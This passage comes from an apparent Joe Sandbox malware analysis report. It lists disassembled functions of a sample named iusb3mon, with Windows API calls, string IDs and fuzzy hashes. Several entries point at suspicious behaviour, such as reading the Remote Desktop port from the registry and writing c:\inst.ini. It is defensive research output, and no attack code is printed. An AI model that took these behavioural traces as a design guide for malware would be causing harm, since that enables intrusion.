                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 670545878-0
                                                                                                                    • Opcode ID: d4992e7267e96ba317a0bc3c32f1d16f497edc649032c7fffc003e72b3429d66
                                                                                                                    • Instruction ID: 090c54809c37e0e9456c005724a66d5991594a1f65922932afc2e000df9cc703
                                                                                                                    • Opcode Fuzzy Hash: d4992e7267e96ba317a0bc3c32f1d16f497edc649032c7fffc003e72b3429d66
                                                                                                                    • Instruction Fuzzy Hash: 1411A032B323235B97B16A695884B6BB2D89F56EE1F07812CED01D7204FB74C8008AE1
                                                                                                                    Function 0624EDA1 Relevance: 9.1, APIs: 6, Instructions: 56memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VirtualFree.KERNEL32(0000000C,00100000,00004000,?,?,?,?,0624B691,0624B6E5,?,?,?), ref: 0624EDD9
                                                                                                                    • VirtualFree.KERNEL32(0000000C,00000000,00008000,?,?,?,?,0624B691,0624B6E5,?,?,?), ref: 0624EDE4
                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,0624B691,0624B6E5,?,?,?), ref: 0624EDF1
                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,0624B691,0624B6E5,?,?,?), ref: 0624EE0D
                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0624B691,0624B6E5,?,?,?), ref: 0624EE2E
                                                                                                                    • HeapDestroy.KERNEL32(?,?,0624B691,0624B6E5,?,?,?), ref: 0624EE40
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Free$HeapVirtual$Destroy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 716807051-0
                                                                                                                    • Opcode ID: c8b01bf627616d11b70ce41d78a4df74b9f3a43f4de2592d5ea282a5bae975e9
                                                                                                                    • Instruction ID: 56bd5c92d55a69d5d9d417e233e49cf6175b4d388bad68dc218c30abbfe17f31
                                                                                                                    • Opcode Fuzzy Hash: c8b01bf627616d11b70ce41d78a4df74b9f3a43f4de2592d5ea282a5bae975e9
                                                                                                                    • Instruction Fuzzy Hash: A7117C35660315AFEBB1AB10FC8DF15B3A6F740720F224434FBC162598C671A981CF05
                                                                                                                    Function 0625B866 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ClientToScreen.USER32(?,?), ref: 0625B875
                                                                                                                    • GetWindow.USER32(?,00000005), ref: 0625B886
                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0625B88F
                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 0625B89E
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0625B8B0
                                                                                                                    • PtInRect.USER32(?,?,?), ref: 0625B8C0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1315500227-0
                                                                                                                    • Opcode ID: d8fa14d1c1c62a758498ae2dd57146cdc18b9f45e246614981b43cf6953bb99e
                                                                                                                    • Instruction ID: bd7ac8a526331c3504f8c4265891e80a332273030608f4395329625fc7598613
                                                                                                                    • Opcode Fuzzy Hash: d8fa14d1c1c62a758498ae2dd57146cdc18b9f45e246614981b43cf6953bb99e
                                                                                                                    • Instruction Fuzzy Hash: F301783251121ABBEB219E64AC0CEFE7769EF44352F024421FE51A60A4E63096168F91
                                                                                                                    Function 06247550 Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 44stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • wsprintfA.USER32 ref: 0624758B
                                                                                                                      • Part of subcall function 062491B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06249216
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0624922E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0624923E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0624924E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0624925B
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06249268
                                                                                                                      • Part of subcall function 062491B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062493F3
                                                                                                                    • lstrlenA.KERNEL32(00000080), ref: 062475B9
                                                                                                                    • lstrlenA.KERNEL32(00000080), ref: 062475C5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Librarylstrlen$FreeLoadwsprintf
                                                                                                                    • String ID: 3389$PortNumber$SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s
                                                                                                                    • API String ID: 4274792114-3034822107
                                                                                                                    • Opcode ID: 1227f324cf2b3ce60831a853bfaf150da934671e44baa2eff38a78c350cfa0f0
                                                                                                                    • Instruction ID: 0f36967f936c174e3d9aa04b3cfd5a7654f466c1f3e337043b3eece833105be2
                                                                                                                    • Opcode Fuzzy Hash: 1227f324cf2b3ce60831a853bfaf150da934671e44baa2eff38a78c350cfa0f0
                                                                                                                    • Instruction Fuzzy Hash: D6F0AFB691122877CB706BA29C49FAF3F2DEF85658F010065BF08B6040D630E656CBF5
                                                                                                                    Function 06248332 Relevance: 9.0, APIs: 6, Instructions: 41COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(75070000), ref: 0624834A
                                                                                                                    • FreeLibrary.KERNEL32(6F060000), ref: 06248354
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0624835E
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 06248368
                                                                                                                    • FreeLibrary.KERNEL32(762F0000), ref: 06248372
                                                                                                                    • FreeLibrary.KERNEL32(76A80000), ref: 0624837C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3664257935-0
                                                                                                                    • Opcode ID: b8e26979bf8d8161245e5de4291398143350ea50210d0f93118339cc90e6b286
                                                                                                                    • Instruction ID: eb014b9e8cba8e501ac08becd78b798391a563477d32d79aa030938147a40784
                                                                                                                    • Opcode Fuzzy Hash: b8e26979bf8d8161245e5de4291398143350ea50210d0f93118339cc90e6b286
                                                                                                                    • Instruction Fuzzy Hash: A4F0FF70B207065BDB74BE7ADC44B57F7EC6F50950B0A4919E851D3650DB78F445CA20
                                                                                                                    Function 0625B632 Relevance: 9.0, APIs: 6, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSystemMetrics.USER32(0000000B), ref: 0625B63F
                                                                                                                    • GetSystemMetrics.USER32(0000000C), ref: 0625B646
                                                                                                                    • GetDC.USER32(00000000), ref: 0625B65F
                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0625B670
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0625B678
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0625B680
                                                                                                                      • Part of subcall function 0625CD61: GetSystemMetrics.USER32(00000002), ref: 0625CD73
                                                                                                                      • Part of subcall function 0625CD61: GetSystemMetrics.USER32(00000003), ref: 0625CD7D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1151147025-0
                                                                                                                    • Opcode ID: 34e378f819761107f16ab03cd1d30e7d776d093f838ba38160cb257266c0d9b8
                                                                                                                    • Instruction ID: 1f4d0e0ebdba4fddc97df5ce7b5f12fcb5c234c5d056ea2578992dab8876f34d
                                                                                                                    • Opcode Fuzzy Hash: 34e378f819761107f16ab03cd1d30e7d776d093f838ba38160cb257266c0d9b8
                                                                                                                    • Instruction Fuzzy Hash: 05F03070640700AAE6706B619C8DF277BA5EB81B52F02442EEB81962D0DAB09841CEA1
                                                                                                                    Function 0624EBFC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetVersionExA.KERNEL32 ref: 0624EC1B
                                                                                                                    • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 0624EC50
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0624ECB0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                                                    • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                                                    • API String ID: 1385375860-4131005785
                                                                                                                    • Opcode ID: 134045c6ce8423a0b0cf09b7850c34ae44ad83e096f07e07f1db6dc77fc0f0ce
                                                                                                                    • Instruction ID: de0ca9f33ae5e981157585abf9173e4bc430c268083656886825ef74d913115d
                                                                                                                    • Opcode Fuzzy Hash: 134045c6ce8423a0b0cf09b7850c34ae44ad83e096f07e07f1db6dc77fc0f0ce
                                                                                                                    • Instruction Fuzzy Hash: 29312671D7129AADFBBDB670AC84AED3B6CBB06304F1A04D5DDC5DA081E6708AC5CB11
                                                                                                                    Function 062599BB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 06259A74
                                                                                                                    • GetWindowLongA.USER32(?,000000FC), ref: 06259A85
                                                                                                                    • GetWindowLongA.USER32(?,000000FC), ref: 06259A95
                                                                                                                    • SetWindowLongA.USER32(?,000000FC,?), ref: 06259AB1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                    • String ID: (
                                                                                                                    • API String ID: 2178440468-3887548279
                                                                                                                    • Opcode ID: aa1fc9971dbfee24638b5fb30b07f395a8aefa6801d8d5c2dc0f5558ea430266
                                                                                                                    • Instruction ID: c840ea37c4f5a78bab66b0a03d72ab16542ff65c84fa5441522320eeccdf5e8c
                                                                                                                    • Opcode Fuzzy Hash: aa1fc9971dbfee24638b5fb30b07f395a8aefa6801d8d5c2dc0f5558ea430266
                                                                                                                    • Instruction Fuzzy Hash: 0B31AE30E20341EFDBB1AF65C884B69B7A5BF44210F16422DED5297690DB70A880CFA1
                                                                                                                    Function 001DDB3E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,5EE195CD,?,?,00000000,001EDA11,000000FF,?,001DDACE,?,?,001DDAA2,00000016), ref: 001DDB73
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001DDB85
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,001EDA11,000000FF,?,001DDACE,?,?,001DDAA2,00000016), ref: 001DDBA7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                    • Opcode ID: 8a64c4445074ee1c1b71ed08907af48c810a546cec92a38d0c6b670fe6ae858c
                                                                                                                    • Instruction ID: ab2a1d0b2f414a6deebb50a72d77f64cfacad99ef996aac80ac1890d041aa462
                                                                                                                    • Opcode Fuzzy Hash: 8a64c4445074ee1c1b71ed08907af48c810a546cec92a38d0c6b670fe6ae858c
                                                                                                                    • Instruction Fuzzy Hash: D001A271A00699AFDB018B90DC49FBEBBF9FB44B24F000526F811A6690DB749D80CA80
                                                                                                                    Function 0624892C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 062488DD: EnterCriticalSection.KERNEL32(?,?,?,06248958,00000005,00000005), ref: 062488E5
                                                                                                                      • Part of subcall function 062488DD: LeaveCriticalSection.KERNEL32(?,?,?,?,?,06248958,00000005,00000005), ref: 062488FD
                                                                                                                    • LoadLibraryA.KERNEL32(ws2_32.dll,00000005,00000005), ref: 0624895D
                                                                                                                    • GetProcAddress.KERNEL32(00000000,closesocket), ref: 0624896B
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0624897F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalLibrarySection$AddressEnterFreeLeaveLoadProc
                                                                                                                    • String ID: closesocket$ws2_32.dll
                                                                                                                    • API String ID: 2819327233-181964208
                                                                                                                    • Opcode ID: 7b90803c1228d0609c64caea324384ddacc9c19aa4579a9402d08e225b16e13a
                                                                                                                    • Instruction ID: 83e113d7b18267d367b29d8991c759a57b35456ba37217d5c6f636665c4a773d
                                                                                                                    • Opcode Fuzzy Hash: 7b90803c1228d0609c64caea324384ddacc9c19aa4579a9402d08e225b16e13a
                                                                                                                    • Instruction Fuzzy Hash: 5BF024BA5203047FD764A754EC4EEEF7BADCB85661F020129FE45D2240FAB0DA40CAB1
                                                                                                                    Function 0624386B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 0624387D
                                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 06243881
                                                                                                                    • ChangeDisplaySettingsA.USER32(?,00000000), ref: 062438B4
                                                                                                                    • ChangeDisplaySettingsA.USER32(00000000,00000000), ref: 062438C9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ChangeDisplayMetricsSettingsSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2205422386-3916222277
                                                                                                                    • Opcode ID: d769a0d034cf79ebb49a1bd99b906fc256ec7d07b2251890b746b00ea446d571
                                                                                                                    • Instruction ID: 32595ea8458aed19e6eaf84a5f6d36b1eac688f856928a13a9ed77e051992bc8
                                                                                                                    • Opcode Fuzzy Hash: d769a0d034cf79ebb49a1bd99b906fc256ec7d07b2251890b746b00ea446d571
                                                                                                                    • Instruction Fuzzy Hash: 55F05E71D2532DEAFB20EBA5DC09F8E7BB8AB04748F100055A608BB1C1D3F065088FE1
                                                                                                                    Function 06242A15 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,c:\inst.ini,?,?,06242661,c:\inst.ini), ref: 06242A2B
                                                                                                                    • WriteFile.KERNEL32(00000000,C:\\rar.exe,0000000B,?,00000000,?,06242661,c:\inst.ini), ref: 06242A40
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,06242661,c:\inst.ini), ref: 06242A4D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandleWrite
                                                                                                                    • String ID: C:\\rar.exe$c:\inst.ini
                                                                                                                    • API String ID: 1065093856-1710477331
                                                                                                                    • Opcode ID: 55e335b40ffbeadfb718bd2ca7546ea441e294df273cbeed9a311693ca04ac40
